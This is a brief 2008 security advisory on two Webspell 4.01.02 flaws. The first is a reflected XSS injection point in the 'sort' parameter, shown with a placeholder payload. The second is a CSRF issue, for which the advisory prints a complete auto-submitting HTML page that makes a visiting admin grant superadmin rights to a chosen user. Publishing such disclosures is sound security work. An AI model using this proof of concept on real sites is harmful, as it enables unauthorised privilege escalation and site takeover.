Webspell 4.01.02 2 Vulnerabilites

2008-01-30T00:00:00
ID SECURITYVULNS:DOC:18979
Type securityvulns
Reporter Securityvulns
Modified 2008-01-30T00:00:00

Description

Webspell 4.01.02 2 Vulnerabilites Founded by NBBN Vendor: http://cms.webspell.org

1) Cross-Site Scripting Vulnerability 2) Change User Permission XSRF Vulnerability

1)

http://site.tld/path/index.php?site=whoisonline&sort=">[xss code]

2)

This creates a superadmin account, when an admin click a link, to a site with the following code:

<html> <head> <title>Superadmin Creator</title> </head> <body onLoad=javascript:document.formular.submit()>

<form name="formular" action="http://site.tld/webspell/admin/admincenter.php?site=members" method="POST"> <input type="hidden" name="superadmin" value="1"> <input type="hidden" name="id" value="3"> <!-- userid --> <input type="hidden" name="saveedit" value="update+member"> </form>

</body> </html>